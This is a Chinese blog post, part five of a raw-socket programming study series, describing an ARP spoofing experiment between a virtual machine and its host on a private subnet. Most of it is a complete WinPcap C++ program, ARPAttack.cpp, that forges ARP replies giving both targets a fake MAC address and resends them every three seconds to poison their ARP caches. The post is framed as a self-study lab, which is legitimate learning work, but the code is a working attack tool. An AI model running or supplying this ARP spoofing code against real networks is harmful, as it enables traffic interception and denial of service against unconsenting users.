原始套接字编程(五)

最新推荐文章于 2023-04-14 19:49:34 发布
最新推荐文章于 2023-04-14 19:49:34 发布
阅读量571 收藏 3
点赞数
分类专栏: 网络编程自学笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011337769/article/details/72628864
版权

虚拟机模拟ARP协议

1.信息查询,

  查询目标主机A(虚拟机)的IP地址:192.168.43.100

  查询目标主机A(虚拟机)的MAC地址:00-0c-29-b2-09-fa

 

  查询目标主机B(本机WM8虚拟网卡)的IP地址:192.168.43.110

  查询目标主机B(本机WM8虚拟网卡)的MAC地址:00-50-56-C0-00-08

 

2.查找arp缓存表

通过使用arp –a命令,找到对应接口下的arp缓存表


如图表中不存在虚拟主机的缓存表,此时通过ping命令相互ping一次,使地址被记录



3.编程主动向这2个目标发送ARP响应包,欺骗MAC地址已经修改。

实际:    

目标A:

00-0C-29-B2-09-FA  -   192.168.43.100

目标B:

00-50-56-C0-00-08   -  192.168.43.110

改变后:

告诉A:

通讯的B的MAC地址变了12-34-56-78-9A-BC - 192.168.43.110

告诉B

通讯的A的MAC地址变了12-34-56-78-9A-BC - 192.168.43.100

 

4.发送原始数据包

 pcap_findalldevs:获取设备列表

 pcap_open_live:打开网卡,准备抓取流量

 pcap_freealldevs:释放设备列表中的空间

 pcap_sendpacket:发送ARP包

编写代码: ARPAttack.cpp

// ARPAttack.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"

#include "pcap.h"
#include "protocol.h"

#include <WinSock2.h>
#pragma comment(lib,"ws2_32.lib")

#pragma comment(lib,"wpcap.lib")
//打开虚拟网卡VM8
pcap_t *init()
{
	pcap_if_t *alldevs;
	pcap_if_t *d;
	int inum;
	int i = 0;
	pcap_t *adhandle;
	char errbuf[PCAP_ERRBUF_SIZE];

	/*
	显示网卡设备列表
	*/
	if (pcap_findalldevs(&alldevs, errbuf) == -1)
	{
		fprintf(stderr, "Error in pcap_findalldevs: %s\n", errbuf);
		exit(1);
	}

	/*
	打印列表
	*/
	for (d = alldevs; d; d = d->next)
	{
		printf("%d. %s", ++i, d->name);
		if (d->description)
		{
			printf("(%s)\n", d->name);
		}
		else
		{
			printf("(no description available)\n");
		}
	}

	if (i == 0)
	{
		printf("\n no interfaces found! Make sure WinPcap is installed\n");
		return 0;
	}

	printf("Enter the interface number(1-%d):", i);
	scanf("%d",&inum);

	if (inum < 1 || inum > i)
	{
		printf("\nInterface number out of range\n");
		pcap_freealldevs(alldevs);
		return 0;
	}

	//跳到选择的适配器
	for (d = alldevs, i = 0; i < inum - 1; d = d->next, i++)
	{
	}
	//打开设备和适配器
	if ((adhandle = pcap_open_live(d->name,
		65536,
		1,
		1000,
		errbuf)) == NULL)
	{
		fprintf(stderr, "\nUnable to open the adapter. %s is not supported by winPcap\n");
		//释放设备列表
		pcap_freealldevs(alldevs);
		return 0;
	}

	printf("\nlistening on %s ...\n", d->description);

	//此刻不需要任何设备列表,可以释放
	pcap_freealldevs(alldevs);
	return adhandle;
}

//把字符转成16进制数
//把输入的12字节的MAC字符串,转变为6字节的16进制MAC地址
void ChangeMacAddr(char *p, UCHAR a[])
{
	char *p1 = NULL;
	int i = 0;
	int high, low;
	char temp[1];
	for (i = 0; i < 6; i++)
	{
		p1 = p + 1;
		switch (*p1)
		{
		//计算低位的16进制
		case 'A':
			low = 10;
			break;
		case 'B':
			low = 11;
			break;
		case 'C':
			low = 12;
			break;
		case 'D':
			low = 13;
			break;
		case 'E':
			low = 14;
			break;
		case 'F':
			low = 15;
			break;
		default:
			temp[0] = *p1;
			//如果为数字就直接转变成对应的数值
			low = atoi(temp);
		}

		switch (*p)
		{
		//计算高16进制
		case 'A':
			high = 10;
			break;
		case 'B':
			high = 11;
			break;
		case 'C':
			high = 12;
			break;
		case 'D':
			high = 13;
			break;
		case 'E':
			high = 14;
			break;
		case 'F':
			high = 15;
			break;
		default:
			temp[0] = *p;
			//如果为数字就直接转变成对应的数值
			high = atoi(temp);
		}
		//指针指向下一个x(高)x(低)字符串
		p += 2;
		//求16进制值
		a[i] = high * 16 + low;
	}
}

//构建ARP包
void makeArpPacket(ARP_PACKET &ARPPacket, char * srcMac, char * srcIP, char * dstMac, char * dstIP)
{
	UCHAR MacAddr[6] = { 0 };

	//以太网头
	//目的MAC地址
	ChangeMacAddr(dstMac, ARPPacket.ehhdr.eh_dst);   
	//源MAC地址。
	ChangeMacAddr(srcMac, ARPPacket.ehhdr.eh_src);   
	//数据类型ARP请求或应答
	ARPPacket.ehhdr.eh_type = htons(EPT_ARP);        

	//ARP头 
	//硬件地址为0x0001表示以太网地址
	ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);  
	//协议类型字段为0x0800表示IP地址
	ARPPacket.arphdr.arp_pro = htons(EPT_IP);        
	//硬件地址长度和协议地址长度分别指出硬件地址和协议地址的长度,
	ARPPacket.arphdr.arp_hln = 6;                    
	//以字节为单位。对于以太网上IP地址的ARP请求或应答来说,它们的值分别为6和4。
	ARPPacket.arphdr.arp_pln = 4;                    
	//ARP请求值为1,ARP应答值为2,RARP请求值为3,RARP应答值为4
	ARPPacket.arphdr.arp_op = htons(ARP_REPLY);      
	//发送方 源MAC地址(欺骗的MAC地址)
	ChangeMacAddr(srcMac, ARPPacket.arphdr.arp_sha); 
	//发送方 源IP地址 (欺骗的MAC地址)
	ARPPacket.arphdr.arp_spa = inet_addr(srcIP);     
	//目标的MAC地址 
	ChangeMacAddr(dstMac, ARPPacket.arphdr.arp_tha); 
	//目标的IP地址  
	ARPPacket.arphdr.arp_tpa = inet_addr(dstIP);     
}

//发送ARP包
void sendArpPacket(pcap_t *fp, ARP_PACKET &ARPPacket)
{
	if (pcap_sendpacket(fp, (const u_char*)&ARPPacket, sizeof(ARPPacket)) != 0)
	{
		fprintf(stderr, "\nRrror sending the packet:%s\n", pcap_geterr(fp));
		return;
	}
}

int _tmain(int argc, _TCHAR* argv[])
{
	//1.初始化网络环境
	pcap_t *adhandle = init();

	//2.填充数据包
	ARP_PACKET ARPPacket_A = { 0 };
	ARP_PACKET ARPPacket_B = { 0 };

	makeArpPacket(ARPPacket_A, "123456789ABC", "192.168.43.110", "000C29B209FA", "192.168.43.100");
	makeArpPacket(ARPPacket_B, "123456789ABC", "192.168.43.100", "005056C00008", "192.168.43.110");

	while (true)
	{
		//3.发送数据包
		sendArpPacket(adhandle, ARPPacket_A);
		sendArpPacket(adhandle, ARPPacket_B);
		printf("send 0k!\n");
		Sleep(3000);
	}

	pcap_close(adhandle);
	return 0;
}

5.环境配置:

5.1:


5.2:


5.3:


5.4:

网卡选择


再在注册表中查找对应的网卡



6:测试



u011337769
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第13章 原始套接字
weixin_48591705的博客
07-10 537
笔记
原始套接字
xixihaha331的博客
06-06 1854
最近自己在学习套接字,感觉原始套接字这块内容比较难以理解,但这部分的内容却十分有意思,所以自己对自己的学习到的知识点进行总结。     在学习int socket(int domain, int type, int protocol)时发现在函数的第二个参数位置type类型有3种。 SOCK_STREAM   字节流套接字    SOCK_DGRAM     数据报套接字 SOC
原始套接字编程
09-14
linux原始套接字编程,利用原始套接字实现arp请求和接收源代码
TCP套接字编程 java原生
yichudu
12-16 1217
import java.io.DataInputStream; import java.io.DataOutputStream; import java.io.InputStream; import java.io.OutputStream; import java.net.InetAddress; import java.net.Socket; import org.w3c.do
原始套接字编程源码
09-13
原始套接字编程源码 SOCKET编程 AnalyzeETH_WinPcap
[转]原始套接字编程
weixin_34034670的博客
12-07 55
sock_raw原始套接字编程可以接收到本机网卡上的数据帧或者数据包,对与监听网络的流量和分析是很有作用的.一共可以有3种方式创建这种socket1.socket(AF_INET, SOCK_RAW, IPPROTO_TCP|IPPROTO_UDP|IPPROTO_ICMP)发送接收ip数据包2.socket(PF_PACKET, SOCK_RAW, htons(ETH_P_IP|ETH_P_A...
原始套接字编程(三)
u011337769的博客
05-22 395
Ping命令实现 1.包含库, 2.初始化环境 3.构建ICMP报文 4.发送ICMP报文 5.接收回复报文 代码:PingCmd.cpp // PingCmd.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include #pragma comment(lib, "ws2_32.lib") //ip头部 typedef struct
Python原始套接字编程实例解析
12-20
Python原始套接字编程是一种高级网络通信技术,它允许程序员直接操作网络协议栈,从而能够构建自定义的数据包并直接在IP层进行发送。在本文,我们将深入探讨如何使用Python进行原始套接字编程,特别是在构造和发送...
Qt套接字编程源码
03-25
**Qt套接字编程源码详解** 在软件开发,网络通信是不可或缺的一部分,而Qt框架提供了一套强大且易用的套接字编程接口,使得开发者能够方便地实现客户端和服务器之间的数据交换。本篇将深入探讨Qt套接字编程的原理...
网络通信编程原始套接字程序设计ppt课件.ppt
11-12
总的来说,原始套接字编程是一项高级技术,它允许开发者更深入地理解和控制网络通信过程,但同时也需要谨慎使用,以防止潜在的安全问题。学习和掌握原始套接字编程,可以提升网络编程的能力,实现更多定制化的网络...
Linux网络编程原始套接字的魔力【上】
lxhjjz的专栏
08-28 1048
原文出处 基于原始套接字编程        在开发面向连接的TCP和面向无连接的UDP程序时,我们所关心的核心问题在于数据收发层面,数据的传输特性由TCP或UDP来保证:        也就是说,对于TCP或UDP的程序开发,焦点在Data字段,我们没法直接对TCP或UDP头部字段进行赤裸裸的修改,当然还有IP头。换句话说,我们对它们头部操作的空间非常受限,只能使用它们已经开放给我们的诸
原始套接字Raw Socket基础-- WSADATA wsaData(转)
wujinzi_ujn的专栏
02-08 1903
原文地址 http://blog.163.com/baorongzhen@126/blog/static/788692122010111941926896/ 在进入Raw Socket多种强大的应用之前,我们先讲解怎样建立一个Raw Socket及怎样用建立的Raw Socket发送和接收IP包。   建立Raw Socket   在Windows平台上,为了使用Raw Socket
原始套接字编程,图文并茂解决网络编程烦恼
最新发布
weixin_28673511的博客
04-14 1194
原始套接字编程相对于普通套接字编程难度更高,初学者很难掌握,本文章通过图文方式讲解原始套接字编程,学完后菜鸟便大神。
20170314_原始套接字编程
chenxing0606的博客
03-14 446
一些专业术语 SOCKET_STEAM 流式套接字TCP SOCKET_DGRAM 数据包套接字UDP SOCKET_RAW 原始套接字 IPPROTO_IP IP协议 IPPROOTO_ICMP INTERNAT 控制消息协议:配合原始套接字可以实现ping功能 IPP...
原始套接字编程(1)
一步一脚印
06-26 646
Linux下原始套接字的原理创建原始套接字: socket(AF_NET, SOCK_RAW, protocol); 1. 参数protocol用来致命所接收的协议包,如果是像IPPROTO_TCP(6)这种非0、非255的协议,能接收ip头为protocol域的数据包,包括IP头,协议头以及数据;发送数据时,默认只需构建protocol协议头及数据,不需构建IP头。可以通过设置原始套接字
模拟题
qq_39126238的博客
09-29 753
单选题* 1、若已有定义 float a=10.95;将变量 a 的数据转化为 CString 类型,可用语句( )。 (1)CString s(a); (2)CString s=a; (3)CString s;s=a; (4)CString s; s.Format("%f",a); 答案:D 2、设置编辑控件的文本内容,可使用函数 ( )。 A.SetWindowText() B.SetSel() C.ReplaceSel() D.GetWindowText() 答案:A 3、WinSock2 的开发组
使用原始套接字编程实现简单的ping程序
zhangxiaofangtongxue的专栏
07-20 7406
程序实现步骤: 1、初始化Windows Sockets网络环境   WSADATA    wsa; WSAStartup(MAKEWORD(2,2),&wsa); 2、构造目的端Socket地址 3、创建原始套接字 4、定义IP和ICMP头部数据结构 5、发送报文 6、接收报文 其ICMP回显请求与回显应答报文结构如下图: typedef struct IcmpHead
原始套接字功能与编程应用
原始套接字是Linux和Unix系统的一种高级网络编程接口,它允许用户直接操作网络协议栈的底层,提供了超越TCP/UDP协议功能的可能性。在第13章,主要讨论了IPv4数据报格式和原始套接字的特性。 IPv4数据报结构,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值